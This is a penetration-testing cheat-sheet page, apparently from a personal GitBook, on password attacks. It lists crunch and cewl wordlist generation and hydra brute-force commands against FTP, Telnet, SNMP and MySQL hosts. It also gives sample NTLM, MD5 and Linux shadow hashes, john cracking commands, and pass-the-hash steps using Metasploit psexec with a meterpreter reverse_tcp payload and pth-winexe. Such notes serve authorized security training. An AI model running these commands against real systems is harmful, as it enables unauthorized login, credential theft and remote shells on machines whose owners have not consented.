🐧
Hassan Saad
  • WHO AM I ?
  • Red Teaming
    • C2 Infrastructure
    • External Reconnaissance
    • Initial Compromise
      • Executable File (EXE)
      • HTML Application (HTA)
      • Visual Basic (VBA Macros)
      • Password Spraying
      • MITM Attack
      • Email Spoofing
    • Host Reconnaissance
      • Seatbelt
      • Screenshots & Keylogging
    • Host Persistence
      • Task Scheduler
      • Startup Folder
      • Registry AutoRun
      • COM Hijacking
    • Host Privilege Escalation
      • Automated Tools
      • Unquoted Service Path
      • Weak Service Permission
      • Weak Service Binary
      • Always Install Elevated
      • UAC Bypass
    • Domain Reconnaissance
      • PowerView
      • BloodHound
      • Linux Host
      • Internal Applications
    • Lateral Movement
      • PowerShell Remoting
      • PsExec
      • WMI
      • DCOM
    • Credentials Access
      • LogonPasswords
      • Security Account Manager (SAM)
      • Domain Cached Creds
      • Kerberos Tickets
      • DPAPI
      • User Impersonation
      • Pass The Hash
      • Over Pass The Hash
      • Internal Password Spraying
      • Sniffing
      • NTLM Relay
    • Pivoting & Forwarding
      • SOCKS Proxy
      • Reverse Port Forwards
      • Local Port Forwards
      • Session Passing
      • P2P Listeners
      • NTLM Relay
    • Kerberos
      • Authentication
      • Kerberoasting
      • ASREP-Roasting
      • Unconstrained Delegation
      • Constrained Delegation
      • Linux Credential Cache
    • Group Policy
      • Enumeration
      • RSAT (GPMC)
      • Sharp GPO Abuse
    • Access Control Lists (DACL)
      • GenericAll
      • WriteDacl
      • WriteOwner
    • MS SQL Servers
      • Enumeration
      • NetNTLM Capture
      • Command Execution
      • Lateral Movement
      • Privilege Escalation
    • Domain Dominance
      • DCSync Backdoor
      • AdminSDHolder
      • Remote Registry Backdoor
      • Skeleton Key
      • Silver Ticket
      • Golden Ticket
    • Forest & Domain Trusts
      • Parent/Child
      • One Way (Inbound)
      • One Way (Outbound)
    • Evasion Techniques
      • Obfuscation
      • Process Injection
      • LAPS
      • AppLocker
      • PowerShell Constrained Mode
      • AMSI
      • Antivirus Exclusion
  • Penetration Testing
    • Information Gathering
    • Scanning
    • Exploitation
    • Post Exploitation
    • Password Attacks
    • Web Attacks
    • Exploit Development
  • Technology Essentials
    • Linux
      • Basics
      • Tasks
    • Windows
      • Basics
      • Tasks
    • Network
      • Basics
      • Tasks
    • Programming
      • Basics
      • Tasks
  • Bug Hunting
    • XSS on Nokia
    • XSS on Wuzzuf
    • Business Logic Flaw on Souq (Amazon Company)
    • Rate Limit Bypass on LinkedIn
    • Sensitive Data Exposure on Google
  • Tools
    • Recon Hunter
    • Mail Hunter
    • Mobile Hunter
    • Chimera (Threat Hunter)
  • Extras
    • SQL Injection
    • Web Basics
    • Mobile Testing
      • Mobile Testing 1
      • Mobile Testing 2
      • Mobile Testing 3
Powered by GitBook
On this page
  • Passwords Generation
  • Online Attack
  • Offline Attack
  • Pass The Hash
  1. Penetration Testing

Password Attacks

Passwords Generation

Custom

# Basic Syntax
crunch {min} {max} {characters} -o {outputFile}
crunch 4 6 0123456789ABCDEF -o crunch1.txt
crunch 6 6 -f /usr/share/crunch/charset.lst mixalpha -o crunch2.txt

# Generate Specific Passwords
, => upper
@ => lower
^ => special char
% => number
Crunch 8 8 -t ,@@@@^%%

Profiling

cewl -d 1 -m 5 --with-numbers -v -w passcewl.txt https://www.google.com

Online Attack

# FTP
hydra -V -L users.txt -P pass.txt -t 20 192.168.1.104 ftp
hydra -V -L users.txt -e nsr -t 20 192.168.100.31 ftp
hydra -V -L users.txt -P pass.txt -e nsr -t 20 192.168.100.31 ftp

# Telnet
hydra -V -L users.txt -P pass.txt -t 10 192.168.1.104 telnet

# SNMP
hydra -V -P pass.txt 192.168.1.244 snmp

# MYSQL
hydra -V -L users.txt -P pass.txt -t 10 192.168.1.104 mysql
hydra -V -L users.txt -p "" -t 10 192.168.1.104 mysql

Offline Attack

Hash Examples

# MD5
user1:827ccb0eea8a706c4c34a16891f84e7b
user2:e988532b766b8272ad0ee62911bffce4

# Windows NTLM & LM
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:3a0842db8bfe9eddd03f8f5017348cc8:::
test:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test123:1008:aad3b435b51404eeaad3b435b51404ee:7a21990fcd3d759941e45c490f143d5f:::
student123:1005:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Student:1000:AAD3B435B51404EEAAD3B435B51404EE:EAB4556003A83E179A149CE6583E097F:::
test1234:1001:aad3b435b51404eeaad3b435b51404ee:3b1b47e42e0463276e3ded6cef349f93:::

# Linux Hash SHA-512
root:$6$.M0YwYN9$1grnLORHHShGJ5CnNS7gjMYAwPs7sDRdeMJ7HEUeuvgKEBdJ5VGYk866IRDHQE0bM.ou0qlGQhPpCzq46emjL0:17996:0:99999:7:::
test:$6$.Nyrlw0pwMxGTBwI$gQ4jC3D8v7ubCDuAIGsjGqmxLP2/0bC.3FFK2FDDTrZGLa3A7WRBPAHSD5gvz.IZ2wgtAijtiQ3r8hriTG79/.:18003:0:99999:7:::

Hash Cracking

# Linux Hash Formats
john --format=md5crypt hashes.txt # md5 $1
john --format=sha256crypt hashes.txt # sha-256 $5
john --format=sha512crypt hashes.txt # sha-512 $6

# Windows Hash Formats
john --format=LM hashes.txt #LM
john --format=NT hashes.txt #NT

# Normal md5
John --format=raw-MD5 hashes.txt

# Crack using custom wordlist
john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-MD5 hashes.txt

Pass The Hash

# Metasploit
msfconsole
> use exploit/windows/smb/psexec
> set RHOST 192.168.57.131
> set SMBUser administrator
> set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
> set payload windows/meterpreter/reverse_tcp
> set LHOST 192.168.57.133
> set LPORT 4444
> exploit

# PTH
pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:2892d26cdf84d7a70e2eb3b9f05c425e //10.11.0.22 cmd
PreviousPost ExploitationNextWeb Attacks

Last updated 2 years ago